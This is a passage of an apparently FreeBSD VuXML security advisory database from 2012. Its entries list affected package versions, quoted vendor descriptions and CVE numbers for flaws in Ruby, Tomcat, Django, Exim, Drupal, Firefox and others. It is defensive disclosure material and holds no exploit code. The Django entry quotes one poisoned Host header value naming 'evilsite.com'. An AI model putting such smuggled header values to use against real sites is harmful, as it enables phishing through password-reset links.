<body xmlns="http://www.w3.org/1999/xhtml">
<p>The official ruby site reports:</p>
<blockquote cite="http://www.ruby-lang.org/en/news/2012/11/09/ruby19-hashdos-cve-2012-5371/">
<p>Carefully crafted sequence of strings can cause a denial of service
attack on the service that parses the sequence to create a Hash
object by using the strings as keys. For instance, this
vulnerability affects web application that parses the JSON data
sent from untrusted entity.</p>
<p>This vulnerability is similar to CVS-2011-4815 for ruby 1.8.7. ruby
1.9 versions were using modified MurmurHash function but it's
reported that there is a way to create sequence of strings that
collide their hash values each other. This fix changes the Hash
function of String object from the MurmurHash to SipHash 2-4.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5371</cvename>
<url>http://www.ruby-lang.org/en/news/2012/11/09/ruby19-hashdos-cve-2012-5371/</url>
</references>
<dates>
<discovery>2012-11-10</discovery>
<entry>2012-11-10</entry>
</dates>
</vuln>
<vuln vid="152e4c7e-2a2e-11e2-99c7-00a0d181e71d">
<topic>tomcat -- authentication weaknesses</topic>
<affects>
<package>
<name>tomcat</name>
<range><gt>5.5.0</gt><lt>5.5.36</lt></range>
<range><gt>6.0.0</gt><lt>6.0.36</lt></range>
<range><gt>7.0.0</gt><lt>7.0.30</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security.html">
<p>Three weaknesses in Tomcat's implementation of DIGEST
authentication were identified and resolved:</p>
<ul>
<li> Tomcat tracked client rather than server nonces and nonce count.</li>
<li> When a session ID was present, authentication was bypassed.</li>
<li> The user name and password were not checked before when indicating
that a nonce was stale.</li>
</ul>
<p>These issues reduced the security of DIGEST authentication making
replay attacks possible in some circumstances.</p>
<p>The first issue was identified by Tilmann Kuhn. The second and third
issues were identified by the Tomcat security team during the code
review resulting from the first issue.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3439</cvename>
<url>http://tomcat.apache.org/security.html</url>
<url>http://tomcat.apache.org/security-5.html</url>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-11-05</discovery>
<entry>2012-11-08</entry>
<modified>2012-11-09</modified>
</dates>
</vuln>
<vuln vid="4ca26574-2a2c-11e2-99c7-00a0d181e71d">
<topic>tomcat -- Denial of Service</topic>
<affects>
<package>
<name>tomcat</name>
<range><gt>6.0.0</gt><lt>6.0.36</lt></range>
<range><gt>7.0.0</gt><lt>7.0.28</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Apache Software Foundation reports:</p>
<blockquote cite="http://tomcat.apache.org/security.html">
<p>The checks that limited the permitted size of request headers were
implemented too late in the request parsing process for the HTTP NIO
connector. This enabled a malicious user to trigger an
OutOfMemoryError by sending a single request with very large
headers. This issue was identified by Josh Spiewak.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2733</cvename>
<url>http://tomcat.apache.org/security.html</url>
<url>http://tomcat.apache.org/security-6.html</url>
<url>http://tomcat.apache.org/security-7.html</url>
</references>
<dates>
<discovery>2012-11-05</discovery>
<entry>2012-11-08</entry>
<modified>2012-11-09</modified>
</dates>
</vuln>
<vuln vid="4b8b748e-2a24-11e2-bb44-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><le>11.2r202.243</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-22.html">
<p>These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5274</cvename>
<cvename>CVE-2012-5275</cvename>
<cvename>CVE-2012-5276</cvename>
<cvename>CVE-2012-5277</cvename>
<cvename>CVE-2012-5278</cvename>
<cvename>CVE-2012-5279</cvename>
<cvename>CVE-2012-5280</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-24.html</url>
</references>
<dates>
<discovery>2012-10-08</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="38daea4f-2851-11e2-9483-14dae938ec40">
<topic>opera -- multiple vulnerabilities</topic>
<affects>
<package>
<name>opera</name>
<range><lt>12.10</lt></range>
</package>
<package>
<name>opera-devel</name>
<range><lt>12.10</lt></range>
</package>
<package>
<name>linux-opera</name>
<range><lt>12.10</lt></range>
</package>
<package>
<name>linux-opera-devel</name>
<range><lt>12.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Opera reports:</p>
<blockquote cite="http://www.opera.com/support/kb/view/1030/">
<p>CORS (Cross-Origin Resource Sharing) allows web pages to retrieve
the contents of pages from other sites, with their permission,
as they would appear for the current user.
When requests are made in this way, the browser should only allow
the page content to be retrieved if the target site sends the
correct headers that give permission for their contents to be
used in this way. Specially crafted requests may trick Opera
into thinking that the target site has given permission when it
had not done so. This can result in the contents of any target page
being revealed to untrusted sites, including any
sensitive information or session IDs contained within the
source of those pages.</p>
</blockquote>
<p>Also reported are vulnerabilities involving SVG graphics and XSS.</p>
</body>
</description>
<references>
<url>http://www.opera.com/support/kb/view/1030/</url>
<url>http://www.opera.com/support/kb/view/1031/</url>
<url>http://www.opera.com/support/kb/view/1033/</url>
</references>
<dates>
<discovery>2012-11-06</discovery>
<entry>2012-11-06</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="36533a59-2770-11e2-bb44-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><le>11.2r202.238</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-22.html">
<p>These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5248</cvename>
<cvename>CVE-2012-5249</cvename>
<cvename>CVE-2012-5250</cvename>
<cvename>CVE-2012-5251</cvename>
<cvename>CVE-2012-5252</cvename>
<cvename>CVE-2012-5253</cvename>
<cvename>CVE-2012-5254</cvename>
<cvename>CVE-2012-5255</cvename>
<cvename>CVE-2012-5256</cvename>
<cvename>CVE-2012-5257</cvename>
<cvename>CVE-2012-5258</cvename>
<cvename>CVE-2012-5259</cvename>
<cvename>CVE-2012-5260</cvename>
<cvename>CVE-2012-5261</cvename>
<cvename>CVE-2012-5262</cvename>
<cvename>CVE-2012-5263</cvename>
<cvename>CVE-2012-5264</cvename>
<cvename>CVE-2012-5265</cvename>
<cvename>CVE-2012-5266</cvename>
<cvename>CVE-2012-5267</cvename>
<cvename>CVE-2012-5269</cvename>
<cvename>CVE-2012-5270</cvename>
<cvename>CVE-2012-5271</cvename>
<cvename>CVE-2012-5272</cvename>
<cvename>CVE-2012-5285</cvename>
<cvename>CVE-2012-5286</cvename>
<cvename>CVE-2012-5287</cvename>
<cvename>CVE-2012-5673</cvename>
<cvename>CVE-2012-2034</cvename>
<cvename>CVE-2012-2035</cvename>
<cvename>CVE-2012-2036</cvename>
<cvename>CVE-2012-2037</cvename>
<cvename>CVE-2012-2038</cvename>
<cvename>CVE-2012-2039</cvename>
<cvename>CVE-2012-2040</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-22.html</url>
</references>
<dates>
<discovery>2012-10-08</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="65539c54-2517-11e2-b9d6-20cf30e32f6d">
<topic>apache22 -- several vulnerabilities</topic>
<affects>
<package>
<name>apache22</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-event-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-itk-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-peruser-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
<package>
<name>apache22-worker-mpm</name>
<range><gt>2.2.0</gt><lt>2.2.23</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<h1>Apache HTTP SERVER PROJECT reports:</h1>
<blockquote cite="http://httpd.apache.org/security/vulnerabilities_22.html">
<h1>low: XSS in mod_negotiation when untrusted uploads are supported CVE-2012-2687</h1>
<p>Possible XSS for sites which use mod_negotiation and
allow untrusted uploads to locations which have MultiViews enabled.</p>
<h1>low: insecure LD_LIBRARY_PATH handling CVE-2012-0883</h1>
<p>This issue was already fixed in port version 2.2.22_5</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2687</cvename>
<cvename>CVE-2012-0833</cvename><!-- already fixed in r301849 -->
</references>
<dates>
<discovery>2012-09-13</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="ec89dc70-2515-11e2-8eda-000a5e1e33c6">
<topic>webmin -- potential XSS attack via real name field</topic>
<affects>
<package>
<name>webmin</name>
<range><lt>1.600_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The webmin updates site reports</p>
<blockquote cite="http://www.webmin.com/updates.html">
<p>Module: Change Passwords; Version: 1.600; Problem: Fix for potential XSS attack
via real name field; Solution: New module.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.webmin.com/updates.html</url>
</references>
<dates>
<discovery>2012-11-02</discovery>
<entry>2012-11-02</entry>
</dates>
</vuln>
<vuln vid="3decc87d-2498-11e2-b0c7-000d601460a4">
<topic>ruby -- Unintentional file creation caused by inserting an illegal NUL character</topic>
<affects>
<package>
<name>ruby</name>
<range><gt>1.9.3,1</gt><lt>1.9.3.286,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The official ruby site reports:</p>
<blockquote cite="http://www.ruby-lang.org/en/news/2012/10/12/poisoned-NUL-byte-vulnerability/">
<p>A vulnerability was found that file creation routines can create
unintended files by strategically inserting NUL(s) in file paths.
This vulnerability has been reported as CVE-2012-4522.</p>
<p>Ruby can handle arbitrary binary patterns as Strings, including
NUL chars. On the other hand OSes and other libraries tend not.
They usually treat a NUL as an End of String mark. So to interface
them with Ruby, NUL chars should properly be avoided.</p>
<p>However methods like IO#open did not check the filename passed to
them, and just passed those strings to lower layer routines. This
led to create unintentional files.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4522</cvename>
<url>http://www.ruby-lang.org/en/news/2012/10/12/poisoned-NUL-byte-vulnerability/</url>
<url>https://access.redhat.com/security/cve/CVE-2012-4522/</url>
</references>
<dates>
<discovery>2012-10-12</discovery>
<entry>2012-11-01</entry>
</dates>
</vuln>
<vuln vid="2a093853-2495-11e2-b0c7-000d601460a4">
<topic>ruby -- $SAFE escaping vulnerability about Exception#to_s/NameError#to_s</topic>
<affects>
<package>
<name>ruby</name>
<range><gt>1.8.7,1</gt><lt>1.8.7.371,1</lt></range>
<range><gt>1.9.3,1</gt><lt>1.9.3.286,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The official ruby site reports:</p>
<blockquote cite="http://www.ruby-lang.org/en/news/2012/10/12/cve-2012-4464-cve-2012-4466/">
<p>Vulnerabilities found for Exception#to_s, NameError#to_s, and
name_err_mesg_to_s() which is Ruby interpreter-internal API. A
malicious user code can bypass $SAFE check by utilizing one of
those security holes.</p>
<p>Ruby's $SAFE mechanism enables untrusted user codes to run in
$SAFE &gt;= 4 mode. This is a kind of sandboxing so some operations
are restricted in that mode to protect other data outside the
sandbox.</p>
<p>The problem found was around this mechanism. Exception#to_s,
NameError#to_s, and name_err_mesg_to_s() interpreter-internal API
was not correctly handling the $SAFE bits so a String object which
is not tainted can destructively be marked as tainted using them.
By using this an untrusted code in a sandbox can modify a
formerly-untainted string destructively.</p>
<p>Ruby 1.8 once had a similar security issue. It fixed
Exception#to_s and NameError#to_s, but name_err_mesg_to_str() issue
survived previous security fix</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4464</cvename>
<cvename>CVE-2012-4466</cvename>
<url>http://www.ruby-lang.org/en/news/2012/10/12/cve-2012-4464-cve-2012-4466/</url>
<url>https://access.redhat.com/security/cve/CVE-2012-4464/</url>
</references>
<dates>
<discovery>2012-08-21</discovery>
<entry>2012-11-01</entry>
</dates>
</vuln>
<vuln vid="4b738d54-2427-11e2-9817-c8600054b392">
<topic>RT -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>rt40</name>
<range><ge>4.0</ge><lt>4.0.8</lt></range>
</package>
<package>
<name>rt38</name>
<range><lt>3.8.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>BestPractical report:</p>
<blockquote cite="http://blog.bestpractical.com/2012/10/security-vulnerabilities-in-rt.html">
<p>All versions of RT are vulnerable to an email header injection
attack. Users with ModifySelf or AdminUser can cause RT to add
arbitrary headers or content to outgoing mail. Depending on the
scrips that are configured, this may be be leveraged for information
leakage or phishing.</p>
<p>RT 4.0.0 and above and RTFM 2.0.0 and above contain a vulnerability
due to lack of proper rights checking, allowing any privileged user
to create Articles in any class.</p>
<p>All versions of RT with cross-site-request forgery (CSRF)
protection (RT 3.8.12 and above, RT 4.0.6 and above, and any
instances running the security patches released 2012-05-22) contain
a vulnerability which incorrectly allows though CSRF requests which
toggle ticket bookmarks.</p>
<p>All versions of RT are vulnerable to a confused deputy attack on
the user. While not strictly a CSRF attack, users who are not logged
in who are tricked into following a malicious link may, after
supplying their credentials, be subject to an attack which leverages
their credentials to modify arbitrary state. While users who were
logged in would have observed the CSRF protection page, users who
were not logged in receive no such warning due to the intervening
login process. RT has been extended to notify users of pending
actions during the login process.</p>
<p>RT 3.8.0 and above are susceptible to a number of vulnerabilities
concerning improper signing or encryption of messages using GnuPG;
if GnuPG is not enabled, none of the following affect you.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4730</cvename>
<cvename>CVE-2012-4731</cvename>
<cvename>CVE-2012-4732</cvename>
<cvename>CVE-2012-4734</cvename>
<cvename>CVE-2012-4735</cvename>
<cvename>CVE-2012-4884</cvename>
<url>http://blog.bestpractical.com/2012/10/security-vulnerabilities-in-rt.html</url>
</references>
<dates>
<discovery>2012-10-26</discovery>
<entry>2012-11-01</entry>
</dates>
</vuln>
<vuln vid="2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5">
<topic>drupal7 -- multiple vulnerabilities</topic>
<affects>
<package>
<name>drupal7</name>
<range><lt>7.16</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Drupal Security Team reports:</p>
<blockquote cite="http://drupal.org/node/1815912">
<ol>
<li>
<p>Arbitrary PHP code execution</p>
<p>A bug in the installer code was identified that allows an attacker
to re-install Drupal using an external database server under certain
transient conditions. This could allow the attacker to execute
arbitrary PHP code on the original server.</p>
</li>
<li>
<p>Information disclosure - OpenID module</p>
<p>For sites using the core OpenID module, an information disclosure
vulnerability was identified that allows an attacker to read files
on the local filesystem by attempting to log in to the site using a
malicious OpenID server.</p>
</li>
</ol>
</blockquote>
</body>
</description>
<references>
<url>http://drupal.org/node/1815912</url>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-10-31</entry>
</dates>
</vuln>
<vuln vid="6b3b1b97-207c-11e2-a03f-c8600054b392">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>16.0.2,1</lt></range>
<range><lt>10.0.10,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.10,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.13.2</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.10</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.13.2</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>16.0.2</lt></range>
<range><lt>10.0.10</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-90 Fixes for Location object issues</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4194</cvename>
<cvename>CVE-2012-4195</cvename>
<cvename>CVE-2012-4196</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-90.html</url>
</references>
<dates>
<discovery>2012-10-26</discovery>
<entry>2012-10-27</entry>
</dates>
</vuln>
<vuln vid="b0f3ab1f-1f3b-11e2-8fe9-0022156e8794">
<topic>Exim -- remote code execution</topic>
<affects>
<package>
<name>exim</name>
<range><ge>4.70</ge><lt>4.80.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>This vulnerability affects Exim instances built with DKIM
enabled (this is the default for FreeBSD Exim port) and running
verification of DKIM signatures on the incoming mail
messages.</p>
<p>Phil Penncock reports:</p>
<blockquote cite="https://lists.exim.org/lurker/message/20121026.080330.74b9147b.en.html">
<p>This is a SECURITY release, addressing a CRITICAL remote
code execution flaw in versions of Exim between 4.70 and
4.80 inclusive, when built with DKIM support (the default).</p>
<p>This security vulnerability can be exploited by anyone
who can send email from a domain for which they control the
DNS.</p>
<p>You are not vulnerable if you built Exim with DISABLE_DKIM
or if you put this at the start of an ACL plumbed into
acl_smtp_connect or acl_smtp_rcpt:</p>
<pre>warn control = dkim_disable_verify</pre>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5671</cvename>
<url>https://lists.exim.org/lurker/message/20121026.080330.74b9147b.en.html</url>
</references>
<dates>
<discovery>2012-10-25</discovery>
<entry>2012-10-26</entry>
</dates>
</vuln>
<vuln vid="5f326d75-1db9-11e2-bc8f-d0df9acfd7e5">
<topic>django -- multiple vulnerabilities</topic>
<affects>
<package>
<name>django</name>
<range><lt>1.4.2</lt></range>
</package>
<package>
<name>django13</name>
<range><lt>1.3.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Django Project reports:</p>
<blockquote cite="https://www.djangoproject.com/weblog/2012/oct/17/security/">
<ol>
<li>
<p>Host header poisoning</p>
<p>Some parts of Django -- independent of end-user-written applications
-- make use of full URLs, including domain name, which are generated
from the HTTP Host header. Some attacks against this are beyond Django's
ability to control, and require the web server to be properly configured;
Django's documentation has for some time contained notes advising users
on such configuration.</p>
<p>Django's own built-in parsing of the Host header is, however, still
vulnerable, as was reported to us recently. The Host header parsing
in Django 1.3 and Django 1.4 -- specifically, django.http.HttpRequest.get_host()
-- was incorrectly handling username/password information in the header.
Thus, for example, the following Host header would be accepted by Django when
running on "validsite.com":</p>
<p>Host: validsite.com:random@evilsite.com</p>
<p>Using this, an attacker can cause parts of Django -- particularly the
password-reset mechanism -- to generate and display arbitrary URLs to users.</p>
<p>To remedy this, the parsing in HttpRequest.get_host() is being modified; Host
headers which contain potentially dangerous content (such as username/password
pairs) now raise the exception django.core.exceptions.SuspiciousOperation.</p>
</li>
<li>
<p>Documentation of HttpOnly cookie option</p>
<p>As of Django 1.4, session cookies are always sent with the HttpOnly flag, which
provides some additional protection from cross-site scripting attacks by denying
client-side scripts access to the session cookie.</p>
<p>Though not directly a security issue in Django, it has been reported that the
Django 1.4 documentation incorrectly described this change, by claiming that this
was now the default for all cookies set by the HttpResponse.set_cookie() method.</p>
<p>The Django documentation has been updated to reflect that this only applies to the
session cookie. Users of Django are encouraged to review their use of set_cookie()
to ensure that the HttpOnly flag is being set or unset appropriately.</p>
</li>
</ol>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4520</cvename>
<url>https://www.djangoproject.com/weblog/2012/oct/17/security/</url>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-10-24</entry>
</dates>
</vuln>
<vuln vid="a7706414-1be7-11e2-9aad-902b343deec9">
<topic>Wireshark -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>wireshark</name>
<range><le>1.8.2_1</le></range>
</package>
<package>
<name>wireshark-lite</name>
<range><le>1.8.2_1</le></range>
</package>
<package>
<name>tshark</name>
<range><le>1.8.2_1</le></range>
</package>
<package>
<name>tshark-lite</name>
<range><le>1.8.2_1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wireshark reports:</p>
<blockquote cite="http://www.wireshark.org/docs/relnotes/wireshark-1.8.3.html">
<p>The HSRP dissector could go into an infinite loop.</p>
<p>The PPP dissector could abort.</p>
<p>Martin Wilck discovered an infinite loop in the DRDA
dissector.</p>
<p>Laurent Butti discovered a buffer overflow in the LDP
dissector.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5237</cvename>
<cvename>CVE-2012-5238</cvename>
<cvename>CVE-2012-5239</cvename>
<cvename>CVE-2012-5240</cvename>
<url>http://www.wireshark.org/security/wnpa-sec-2012-26.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-27.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-28.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-29.html</url>
<url>http://www.wireshark.org/docs/relnotes/wireshark-1.8.3.html</url>
</references>
<dates>
<discovery>2012-10-02</discovery>
<entry>2012-10-22</entry>
<modified>2013-06-19</modified>
</dates>
</vuln>
<vuln vid="57652765-18aa-11e2-8382-00a0d181e71d">
<topic>xlockmore -- local exploit</topic>
<affects>
<package>
<name>xlockmore</name>
<range><lt>5.40_1</lt></range>
</package>
<package>
<name>ja-xlockmore</name>
<range><lt>5.40_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Ignatios Souvatzis of NetBSD reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/10/17/10">
<p>Due to an error in the dclock screensaver in xlockmore, users who
explicitly use this screensaver or a random mix of screensavers using
something like "xlockmore -mode random" may have their screen unlocked
unexpectedly at a random time.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4524</cvename>
<mlist>http://www.openwall.com/lists/oss-security/2012/10/17/10</mlist>
</references>
<dates>
<discovery>2012-10-17</discovery>
<entry>2012-10-17</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="e11955ca-187c-11e2-be36-00215af774f0">
<topic>xinetd -- attackers can bypass access restrictions if tcpmux-servers service enabled</topic>
<affects>
<package>
<name>xinetd</name>
<range><lt>2.3.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Thomas Swan reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=790940">
<p>xinetd allows for services to be configured with the TCPMUX
or TCPMUXPLUS service types, which makes those services
available on port 1, as per RFC 1078 [1], if the tcpmux-server
service is enabled. When the tcpmux-server service is enabled,
xinetd would expose _all_ enabled services via the tcpmux port,
instead of just the configured service(s). This could allow
a remote attacker to bypass firewall restrictions and access
services via the tcpmux port.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0862</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=790940</url>
</references>
<dates>
<discovery>2012-02-15</discovery>
<entry>2012-10-17</entry>
</dates>
</vuln>
<vuln vid="ec34d0c2-1799-11e2-b4ab-000c29033c32">
<topic>Zend Framework -- Multiple vulnerabilities via XXE injection</topic>
<affects>
<package>
<name>ZendFramework</name>
<range><lt>1.11.13</lt></range>
</package>
<package>
<name>magento</name>
<range><lt>1.7.0.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Zend Framework team reports:</p>
<blockquote cite="http://framework.zend.com/security/advisory/ZF2012-01">
<p>The XmlRpc package of Zend Framework is vulnerable to XML
eXternal Entity Injection attacks (both server and client).
The SimpleXMLElement class (SimpleXML PHP extension) is used
in an insecure way to parse XML data. External entities can be
specified by adding a specific DOCTYPE element to XML-RPC
requests. By exploiting this vulnerability an application may be
coerced to open arbitrary files and/or TCP connections.</p>
<p>Additionally, the Zend_Dom, Zend_Feed, Zend_Soap, and
Zend_XmlRpc components are vulnerable to XML Entity Expansion
(XEE) vectors, leading to Denial of Service vectors. XEE attacks
occur when the XML DOCTYPE declaration includes XML entity
definitions that contain either recursive or circular references;
this leads to CPU and memory consumption, making Denial of
Service exploits trivial to implement.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3363</cvename>
<url>https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt</url>
<url>http://framework.zend.com/security/advisory/ZF2012-01</url>
<url>http://framework.zend.com/security/advisory/ZF2012-02</url>
<url>http://www.openwall.com/lists/oss-security/2012/06/26/2</url>
<url>https://secunia.com/advisories/49665/</url>
<url>http://www.magentocommerce.com/download/release_notes</url>
</references>
<dates>
<discovery>2012-06-26</discovery>
<entry>2012-10-16</entry>
<modified>2015-10-14</modified>
</dates>
</vuln>
<vuln vid="f94befcd-1289-11e2-a25e-525400272390">
<topic>gitolite -- path traversal vulnerability</topic>
<affects>
<package>
<name>gitolite</name>
<range><ge>3.01</ge><le>3.04</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Sitaram Chamarty reports:</p>
<blockquote cite="https://groups.google.com/forum/#!topic/gitolite/K9SnQNhCQ-0/discussion">
<p>I'm sorry to say there is a potential path traversal vulnerability in
v3. Thanks to Stephane Chazelas for finding it and alerting me.</p>
<p>Can it affect you? This can only affect you if you are using wild
card repos, *and* at least one of your patterns allows the string
"../" to match multiple times.</p>
<p>How badly can it affect you? A malicious user who *also* has the
ability to create arbitrary files in, say, /tmp (e.g., he has his own
userid on the same box), can compromise the entire "git" user.
Otherwise the worst he can do is create arbitrary repos in /tmp.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4506</cvename>
<mlist msgid="CAMK1S_jotna+d_X2C-+es-M28i1aUBcsNeiXxwJ63EshQ8ht6w@mail.gmail.com">https://groups.google.com/forum/#!topic/gitolite/K9SnQNhCQ-0/discussion</mlist>
</references>
<dates>
<discovery>2012-10-09</discovery>
<entry>2012-10-15</entry>
</dates>
</vuln>
<vuln vid="ef417da3-1640-11e2-999b-e0cb4e266481">
<topic>phpMyAdmin -- Multiple XSS due to unescaped HTML output in Trigger, Procedure and Event pages and Fetching the version information from a non-SSL site is vulnerable to a MITM attack</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><ge>3.5</ge><lt>3.5.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-6.php">
<p>When creating/modifying a trigger, event or procedure
with a crafted name, it is possible to trigger an XSS.</p>
</blockquote>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-7.php">
<p>To display information about the current phpMyAdmin
version on the main page, a piece of JavaScript is fetched
from the phpmyadmin.net website in non-SSL mode. A
man-in-the-middle could modify this script on the wire to
cause mischief.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-5339</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-6.php</url>
<cvename>CVE-2012-5368</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-7.php</url>
</references>
<dates>
<discovery>2012-10-08</discovery>
<entry>2012-10-14</entry>
</dates>
</vuln>
<vuln vid="6e5a9afd-12d3-11e2-b47d-c8600054b392">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>16.0.1,1</lt></range>
<range><lt>10.0.9,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.9,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.13.1</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.9</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.13.1</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>16.0.1</lt></range>
<range><lt>10.0.9</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p> MFSA 2012-74 Miscellaneous memory safety hazards (rv:16.0/
rv:10.0.8)</p>
<p>MFSA 2012-75 select element persistance allows for attacks</p>
<p>MFSA 2012-76 Continued access to initial origin after setting
document.domain</p>
<p>MFSA 2012-77 Some DOMWindowUtils methods bypass security checks</p>
<p>MFSA 2012-78 Reader Mode pages have chrome privileges</p>
<p>MFSA 2012-79 DOS and crash with full screen and history navigation</p>
<p>MFSA 2012-80 Crash with invalid cast when using instanceof
operator</p>
<p>MFSA 2012-81 GetProperty function can bypass security checks</p>
<p>MFSA 2012-82 top object and location property accessible by
plugins</p>
<p>MFSA 2012-83 Chrome Object Wrapper (COW) does not disallow acces
to privileged functions or properties</p>
<p>MFSA 2012-84 Spoofing and script injection through location.hash</p>
<p>MFSA 2012-85 Use-after-free, buffer overflow, and out of bounds
read issues found using Address Sanitizer</p>
<p>MFSA 2012-86 Heap memory corruption issues found using Address
Sanitizer</p>
